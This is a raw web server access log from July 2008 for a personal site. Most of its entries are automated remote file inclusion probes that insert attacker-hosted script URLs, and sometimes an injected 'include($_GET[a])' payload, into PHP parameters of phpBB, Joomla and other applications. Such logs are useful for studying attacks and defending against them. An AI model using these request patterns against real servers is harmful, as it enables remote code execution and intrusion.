69.89.31.195 - - [14/Jul/2008:12:12:08 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:12:11 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:12:12:27 -0700] "GET /logs/homepage.php?sel=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:12:12:27 -0700] "GET /homepage.php?sel=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:12:12:28 -0700] "GET /logs/includes/functions_mod_user.php?phpbb_root_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:12:12:28 -0700] "GET /includes/functions_mod_user.php?phpbb_root_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
65.182.191.60 - - [14/Jul/2008:12:12:40 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.60 - - [14/Jul/2008:12:12:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.60 - - [14/Jul/2008:12:12:40 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.60 - - [14/Jul/2008:12:12:44 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:12:51 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:12:51 -0700] "GET /logs/access_071230.log%20//modules/vwar/admin/admin.php?vwar_root=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:12:53 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.195 - - [14/Jul/2008:12:12:57 -0700] "GET /logs/access_080128.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.241.211 - - [14/Jul/2008:12:13:25 -0700] "GET /bikes/GPS/WeSTOC2008/dmulk_WeSTOC08.gpx HTTP/1.1" 200 3722817 "-" "Microsoft compass/1.0" "www.dmulk.com"
207.58.170.49 - - [14/Jul/2008:12:13:38 -0700] "GET /logs/access.log//trans/trans.php?trans=ko&page=http://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.170.49 - - [14/Jul/2008:12:13:38 -0700] "GET //trans/trans.php?trans=ko&page=http://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.170.49 - - [14/Jul/2008:12:13:38 -0700] "GET /logs//trans/trans.php?trans=ko&page=http://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:14:01 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:12:14:34 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 32970 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:12:14:37 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC HTTP/1.1" 200 32801 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:12:14:38 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:12:14:38 -0700] "GET /errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:12:14:39 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:12:14:40 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=626 HTTP/1.1" 200 7599 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:14:40 -0700] "GET /logs/access_080322.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.27 - - [14/Jul/2008:12:14:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.27 - - [14/Jul/2008:12:14:48 -0700] "GET /bikes/dteel/2008_01_27/Medium/?N=A HTTP/1.1" 200 4825 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.27 - - [14/Jul/2008:12:14:49 -0700] "GET /minamijewelry/source_images/batch1/?M=A HTTP/1.1" 200 5032 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:14:53 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:14:54 -0700] "GET /logs/access_080329.log/db.php?path_local=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:14:56 -0700] "GET //include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:14:58 -0700] "GET /db.php?path_local=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:14:58 -0700] "GET /logs/db.php?path_local=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:12:15:04 -0700] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=626 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=626" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:12:15:05 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=626&just_updated=1 HTTP/1.1" 200 7641 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=626" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:12:15:07 -0700] "GET /logs/access.log/home.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:12:15:07 -0700] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=626&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:12:15:08 -0700] "GET /home.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:12:15:09 -0700] "GET /logs/home.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:12:15:13 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:12:15:14 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 32970 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:12:15:19 -0700] "GET /logs/home.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:15:19 -0700] "GET /logs/access_080128.log//modules/vwar/admin/admin.php?vwar_root=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:12:15:19 -0700] "GET /home.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:12:15:23 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC HTTP/1.1" 200 32799 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:12:15:24 -0700] "GET //codebb/lang_select?phpbb_root_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:15:46 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:15:46 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:16:13 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:16:14 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:16:14 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:16:26 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:12:16:27 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:12:16:27 -0700] "GET /errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:12:16:28 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.27.110.65 - - [14/Jul/2008:12:16:43 -0700] "GET //trans/trans.php?trans=ko&page=http://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [14/Jul/2008:12:16:43 -0700] "GET /logs/access.log//trans/trans.php?trans=ko&page=http://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [14/Jul/2008:12:16:44 -0700] "GET /logs//trans/trans.php?trans=ko&page=http://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.249.151 - - [14/Jul/2008:12:16:47 -0700] "GET /logs/access_080313.log//auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [14/Jul/2008:12:16:47 -0700] "GET //auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [14/Jul/2008:12:16:47 -0700] "GET /logs//auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.125 - - [14/Jul/2008:12:17:07 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.0" 200 17277 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
202.91.241.172 - - [14/Jul/2008:12:17:09 -0700] "GET /logs/access_080322.log//login.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:17:12 -0700] "GET /logs/access.log/players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:17:24 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:17:24 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:17:25 -0700] "GET /logs/access_080225.log//modules/My_eGallery/index.php?basepath=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:17:28 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:12:17:37 -0700] "GET /logs/access_080401.log/index2.php?page=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:12:17:37 -0700] "GET /index2.php?page=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:12:17:40 -0700] "GET /logs/index2.php?page=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:12:17:40 -0700] "GET /logs/access_080129.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:12:17:59 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:12:18:00 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.170.49 - - [14/Jul/2008:12:18:02 -0700] "GET /logs/access_080423.log//trans/trans.php?trans=ko&page=http://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:12:18:05 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:18:09 -0700] "GET /logs/access_080128.log//modules/My_eGallery/index.php?basepath=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.89.162 - - [14/Jul/2008:12:18:35 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.89.162 - - [14/Jul/2008:12:18:35 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.89.162 - - [14/Jul/2008:12:18:35 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.89.162 - - [14/Jul/2008:12:18:36 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:12:18:38 -0700] "GET /logs/access_080327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:12:18:41 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 200 18499 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:12:18:41 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.218 - - [14/Jul/2008:12:18:42 -0700] "GET /logs/access_080315.log%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.18.142.194 - - [14/Jul/2008:12:19:28 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.18.142.194 - - [14/Jul/2008:12:19:28 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.18.142.194 - - [14/Jul/2008:12:19:28 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:19:30 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:19:32 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:19:33 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:12:19:46 -0700] "GET /logs/access_080228.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:12:19:48 -0700] "GET /logs/access_080327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:12:19:51 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 200 18499 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:12:19:51 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:12:19:53 -0700] "GET /logs/access_080228.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:20:13 -0700] "GET /logs/access_080225.log/db.php?path_local=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:20:37 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:20:37 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.89.58 - - [14/Jul/2008:12:20:38 -0700] "GET /logs/access_080117.log//admin/index.php?o=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [14/Jul/2008:12:20:39 -0700] "GET //admin/index.php?o=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [14/Jul/2008:12:20:40 -0700] "GET /logs//admin/index.php?o=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:20:40 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:20:45 -0700] "GET /logs/access_071225.log//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:12:20:46 -0700] "GET /logs/index2.php?x=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:12:20:47 -0700] "GET /index2.php?x=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:20:49 -0700] "GET //include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:20:58 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.154.27 - - [14/Jul/2008:12:21:43 -0700] "GET /logs/errors.php?error=http://queb3.info/cruise/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.154.27 - - [14/Jul/2008:12:21:43 -0700] "GET /errors.php?error=http://queb3.info/cruise/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:12:22:20 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:12:22:20 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
